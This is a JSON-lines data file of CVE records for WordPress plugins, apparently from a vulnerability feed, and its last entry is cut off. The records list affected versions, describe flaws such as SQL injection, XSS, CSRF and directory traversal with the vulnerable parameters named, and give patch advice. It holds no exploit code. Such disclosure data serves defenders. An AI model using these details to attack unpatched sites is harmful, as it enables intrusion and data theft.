{"CVE_ID":"CVE-2024-3820","slug":"wpdatatables","versionImpact":"6.3.1","versionEndExcluding":"6.3.2","description":"The wpDataTables \u2013 WordPress Data Table, Dynamic Tables & Table Charts Plugin plugin for WordPress is vulnerable to SQL Injection via the 'id_key' parameter of the wdt_delete_table_row AJAX action in all versions up to, and including, 6.3.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Please note this only affects the premium version of the plugin.","recommendation":"Update to version 6.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbba822b-172f-4167-bccf-4697a298178e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbba822b-172f-4167-bccf-4697a298178e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpdatatables.com\\\/help\\\/whats-new-changelog\\\/\",\"name\":\"https:\\\/\\\/wpdatatables.com\\\/help\\\/whats-new-changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5803","slug":"business-directory-plugin","versionEndExcluding":"6.3.11","description":"Cross-Site Request Forgery (CSRF) vulnerability in Business Directory Team's Business Directory Plugin \u2013 Easy Listing Directories for WordPress. This issue affects Business Directory Plugin \u2013 Easy Listing Directories for WordPress: from n\/a through 6.3.10.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/business-directory-plugin\\\/wordpress-business-directory-plugin-easy-listing-directories-for-wordpress-plugin-6-3-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/business-directory-plugin\\\/wordpress-business-directory-plugin-easy-listing-directories-for-wordpress-plugin-6-3-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7646","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"6.3.10","versionEndExcluding":"6.3.11","description":"The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom script parameter in all versions up to, and including, 6.3.10 even when the user does not have the unfiltered_html capability. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.3.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.3.11\\\/modules\\\/widgets\\\/tp_hovercard.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.3.11\\\/modules\\\/widgets\\\/tp_hovercard.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58fcab5e-c82e-4072-9a86-94a7f18a6e56?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58fcab5e-c82e-4072-9a86-94a7f18a6e56?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0187","slug":"peepso-core","versionImpact":"6.3.1.1","versionEndExcluding":"6.3.1.2","description":"The Community by PeepSo WordPress plugin before 6.3.1.2 does not sanitise and escape various parameters and generated URLs before outputting them back in attributes, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 6.3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4600411-bee1-4cc8-aee9-0a613ac9b55b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4600411-bee1-4cc8-aee9-0a613ac9b55b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7125","slug":"peepso-core","versionImpact":"6.3.1.1","versionEndExcluding":"6.3.1.2","description":"The Community by PeepSo WordPress plugin before 6.3.1.2 does not have CSRF check when creating a user post (visible on their wall in their profile page), which could allow attackers to make logged in users perform such action via a CSRF attack","recommendation":"Update to version 6.3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cac12b64-ed25-4ee2-933f-8ff722605271\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cac12b64-ed25-4ee2-933f-8ff722605271\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4971","slug":"weaverx-theme-support","versionImpact":"6.3.0","versionEndExcluding":"6.3.1","description":"The Weaver Xtreme Theme Support WordPress plugin before 6.3.1 unserialises the content of an imported file, which could lead to PHP object injection issues when a high privilege user imports a malicious file and a suitable gadget chain is present on the blog.","recommendation":"Update to version 6.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/421194e1-6c3f-4972-8f3c-de1b9d2bcb13\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/421194e1-6c3f-4972-8f3c-de1b9d2bcb13\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3598","slug":"woo-coupon-usage","versionImpact":"6.3.0","versionEndExcluding":"6.3.1","description":"The Coupon Affiliates \u2013 Affiliate Plugin for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the commission_summary parameter in all versions up to, and including, 6.3.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 6.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-coupon-usage\\\/tags\\\/6.2.2\\\/inc\\\/functions\\\/functions-all-time.php#L245\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-coupon-usage\\\/tags\\\/6.2.2\\\/inc\\\/functions\\\/functions-all-time.php#L245\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d6cf33c-ac40-4892-9345-64ebe61e6be6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d6cf33c-ac40-4892-9345-64ebe61e6be6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2877","slug":"formidable","versionEndExcluding":"6.3.1","description":"The Formidable Forms WordPress plugin before 6.3.1 does not adequately authorize the user or validate the plugin URL in its functionality for installing add-ons. This allows a user with a role as low as Subscriber to install and activate arbitrary plugins of arbitrary versions from the WordPress.org plugin repository onto the site, leading to Remote Code Execution.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33765da5-c56e-42c1-83dd-fcaad976b402\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33765da5-c56e-42c1-83dd-fcaad976b402\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1809","slug":"download-manager","versionEndExcluding":"6.3.0","description":"The Download Manager WordPress plugin before 6.3.0 leaks master key information without the need for a password, allowing attackers to download arbitrary password-protected package files.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/57f0a078-fbeb-4b05-8892-e6d99edb82c1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/57f0a078-fbeb-4b05-8892-e6d99edb82c1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13838","slug":"uncanny-automator","versionImpact":"6.2","versionEndExcluding":"6.3","description":"The Uncanny Automator \u2013 Easy Automation, Integration, Webhooks & Workflow Builder Plugin plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.2 via the 'call_webhook' method of the Automator_Send_Webhook class. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249921\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/lib\\\/webhooks\\\/class-automator-send-webhook.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249921\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/lib\\\/webhooks\\\/class-automator-send-webhook.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29eeac86-6b33-49e6-a7e1-c80dee383d6f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29eeac86-6b33-49e6-a7e1-c80dee383d6f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5311","slug":"wp-extra","versionImpact":"6.2","versionEndExcluding":"6.3","description":"The WP EXtra plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the register() function in versions up to, and including, 6.2. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to modify the contents of the .htaccess files located in a site's root directory or \/wp-content and \/wp-includes folders and achieve remote code execution.","recommendation":"Update to version 6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/giongfnef.gitbook.io\\\/giongfnef\\\/cve\\\/cve-2023-5311\",\"name\":\"https:\\\/\\\/giongfnef.gitbook.io\\\/giongfnef\\\/cve\\\/cve-2023-5311\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2977703\\\/wp-extra\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2977703\\\/wp-extra\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87e3dd5e-0d77-4d78-8171-0beaf9482699?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87e3dd5e-0d77-4d78-8171-0beaf9482699?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0250","slug":"analytics-insights","versionImpact":"6.2","versionEndExcluding":"6.3","description":"The Analytics Insights for Google Analytics 4 (AIWP) WordPress plugin before 6.3 is vulnerable to Open Redirect due to insufficient validation of the redirect URL in the oauth2callback.php file. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","recommendation":"Update to version 6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/321b07d1-692f-48e9-a8e5-a15b38efa979\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/321b07d1-692f-48e9-a8e5-a15b38efa979\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5907","slug":"file-manager","versionEndExcluding":"6.3","description":"The File Manager WordPress plugin before 6.3 does not restrict the file manager's root directory, allowing an administrator to set a root outside of the WordPress root directory, giving access to system files and directories even in a multisite setup, where site administrators should not be allowed to modify the site's files.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f250226f-4a05-4d75-93c4-5444a4ce919e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f250226f-4a05-4d75-93c4-5444a4ce919e\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5314","slug":"wp-extra","versionImpact":"6.2","versionEndExcluding":"6.3","description":"The WP EXtra plugin for WordPress is vulnerable to unauthorized access to restricted functionality due to a missing capability check on the 'test-email' section of the register() function in versions up to, and including, 6.2. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to send emails with arbitrary content to arbitrary locations from the affected site's mail server.","recommendation":"Update to version 6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93c10a58-c5f2-440b-a88e-5314143fdd90?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93c10a58-c5f2-440b-a88e-5314143fdd90?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2977703\\\/wp-extra\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2977703\\\/wp-extra\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3246","slug":"litespeed-cache","versionImpact":"6.2.0.1","versionEndExcluding":"6.3","description":"The LiteSpeed Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.2.0.1. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to update the token setting and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8036bd83-9af5-4b71-8974-9b0690ea6769?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8036bd83-9af5-4b71-8974-9b0690ea6769?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123399\\\/litespeed-cache\\\/trunk\\\/src\\\/cloud.cls.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123399\\\/litespeed-cache\\\/trunk\\\/src\\\/cloud.cls.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1093","slug":"miniorange-login-with-eve-online-google-facebook","versionEndExcluding":"6.24.2","description":"The OAuth Single Sign On WordPress plugin before 6.24.2 does not have CSRF checks when discarding Identity Providers (IdP), which could allow attackers to make logged in admins delete all IdP via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e13b9ea-a3ef-483b-b967-6ec14bd6d54d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e13b9ea-a3ef-483b-b967-6ec14bd6d54d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1092","slug":"miniorange-login-with-eve-online-google-facebook","versionEndExcluding":"6.24.2","description":"The OAuth Single Sign On Free WordPress plugin before 6.24.2, OAuth Single Sign On Standard WordPress plugin before 28.4.9, OAuth Single Sign On Premium WordPress plugin before 38.4.9 and OAuth Single Sign On Enterprise WordPress plugin before 48.4.9 do not have CSRF checks when deleting Identity Providers (IdP), which could allow attackers to make logged in admins delete arbitrary IdP via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/52e29f16-b6dd-4132-9bb8-ad10bd3c39d7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/52e29f16-b6dd-4132-9bb8-ad10bd3c39d7\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5eb85df5-8aab-4f30-a401-f776a310b09c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5eb85df5-8aab-4f30-a401-f776a310b09c\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8fbf7efe-0bf2-42c6-aef1-7fcf2708b31b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8fbf7efe-0bf2-42c6-aef1-7fcf2708b31b\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f6e165d9-2193-4c76-ae2d-618a739fe4fb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f6e165d9-2193-4c76-ae2d-618a739fe4fb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10881","slug":"lu-radioplayer","versionImpact":"6.24.11.07","versionEndExcluding":"6.24.11.15","description":"The LUNA RADIO PLAYER plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'lunaradio' shortcode in versions up to, and including, 6.24.11.07 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.24.11.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/radioplayer.luna-universe.com\\\/update\\\/#release-notes\",\"name\":\"https:\\\/\\\/radioplayer.luna-universe.com\\\/update\\\/#release-notes\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ed8a7f8-1af3-4b41-bfaf-fd1c35baa867?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ed8a7f8-1af3-4b41-bfaf-fd1c35baa867?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10816","slug":"lu-radioplayer","versionImpact":"6.24.01.24","versionEndExcluding":"6.24.11.07","description":"The LUNA RADIO PLAYER plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 6.24.01.24 via the js\/fallback.php file. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 6.24.11.07, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/544f71f5-1798-40fd-9f55-c25dae4f557a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/544f71f5-1798-40fd-9f55-c25dae4f557a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/radioplayer.luna-universe.com\\\/update\",\"name\":\"https:\\\/\\\/radioplayer.luna-universe.com\\\/update\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4445","slug":"wp-compress-image-optimizer","versionImpact":"6.20.01","versionEndExcluding":"6.20.02","description":"The WP Compress \u2013 Image Optimizer [All-In-One] plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in versions up to, and including, 6.20.01. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to edit plugin settings, including storing cross-site scripting, in multisite environments.","recommendation":"Update to version 6.20.02, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/830f53a4-da3b-4a95-99f1-c4a4c8e6944c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/830f53a4-da3b-4a95-99f1-c4a4c8e6944c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-compress-image-optimizer\\\/trunk\\\/classes\\\/mu.class.php?rev=2946135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-compress-image-optimizer\\\/trunk\\\/classes\\\/mu.class.php?rev=2946135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082085\\\/#file655\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082085\\\/#file655\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6812","slug":"wp-compress-image-optimizer","versionImpact":"6.20.01","versionEndExcluding":"6.20.02","description":"The WP Compress \u2013 Image Optimizer [All-In-One] plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 6.20.01. This is due to insufficient validation on the redirect url supplied via the 'css' parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","recommendation":"Update to version 6.20.02, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbbf9fbb-74fd-42eb-a781-2a720fe56b13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbbf9fbb-74fd-42eb-a781-2a720fe56b13?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082085\\\/wp-compress-image-optimizer\\\/trunk\\\/fixCss.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082085\\\/wp-compress-image-optimizer\\\/trunk\\\/fixCss.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4681","slug":"hide_my_wp","versionEndExcluding":"6.2.9","description":"The Hide My WP WordPress plugin before 6.2.9 does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a4096e8-abe4-41c4-b741-c44e740e8689\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a4096e8-abe4-41c4-b741-c44e740e8689\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6557","slug":"the-events-calendar","versionImpact":"6.2.8.2","versionEndExcluding":"6.2.9","description":"The The Events Calendar plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.2.8.2 via the route function hooked into wp_ajax_nopriv_tribe_dropdown. This makes it possible for unauthenticated attackers to extract potentially sensitive data including post titles and IDs of pending, private and draft posts.","recommendation":"Update to version 6.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc40196e-c0f3-4bc6-ac4b-b866902def61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc40196e-c0f3-4bc6-ac4b-b866902def61?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010104%40the-events-calendar%2Ftags%2F6.2.9&old=3010096%40the-events-calendar%2Ftags%2F6.2.9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010104%40the-events-calendar%2Ftags%2F6.2.9&old=3010096%40the-events-calendar%2Ftags%2F6.2.9\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6203","slug":"the-events-calendar","versionEndExcluding":"6.2.8.1","description":"The Events Calendar WordPress plugin before 6.2.8.1 discloses the content of password protected posts to unauthenticated users via a crafted request.","recommendation":"Update to version 6.2.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/229273e6-e849-447f-a95a-0730969ecdae\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/229273e6-e849-447f-a95a-0730969ecdae\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5211","slug":"fattura24","versionImpact":"6.2.7","versionEndExcluding":"6.2.8","description":"The Fattura24 WordPress plugin before 6.2.8 does not sanitize or escape the 'id' parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting vulnerability.","recommendation":"Update to version 6.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa868380-cda7-4ec6-8a3f-d9fa692908f2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa868380-cda7-4ec6-8a3f-d9fa692908f2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0276","slug":"weaverx-theme-support","versionEndExcluding":"6.2.7","description":"The Weaver Xtreme Theme Support WordPress plugin before 6.2.7 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d00824a3-7df5-4b52-a31b-5fdfb19c970f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d00824a3-7df5-4b52-a31b-5fdfb19c970f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5034","slug":"wp-file-download","versionImpact":"6.2.5","versionEndExcluding":"6.2.6","description":"The wp-file-download WordPress plugin before 6.2.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.","recommendation":"Update to version 6.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ebd9aa9f-3da9-4457-922f-975bef6e33f8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ebd9aa9f-3da9-4457-922f-975bef6e33f8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0329","slug":"chatbot","versionImpact":"6.2.3","versionEndExcluding":"6.2.4","description":"The AI ChatBot for WordPress WordPress plugin before 6.2.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 6.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/db101819-4404-46c9-a02e-b1b1b7ace11e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/db101819-4404-46c9-a02e-b1b1b7ace11e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8451","slug":"essential-addons-for-elementor-lite","versionImpact":"6.2.2","versionEndExcluding":"6.2.3","description":"The Essential Addons for Elementor \u2013 Popular Elementor Templates & Widgets plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the \u2018data-gallery-items\u2019 parameter in all versions up to, and including, 6.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/assets\\\/front-end\\\/js\\\/view\\\/filterable-gallery.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/assets\\\/front-end\\\/js\\\/view\\\/filterable-gallery.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3344071\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3344071\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4917652a-1c83-4570-98c5-1a34e637814e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4917652a-1c83-4570-98c5-1a34e637814e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1287","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"6.2.2","versionEndExcluding":"6.2.3","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown, Syntax Highlighter, and Page Scroll widgets in all versions up to, and including, 6.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.2.3, or a newer patched 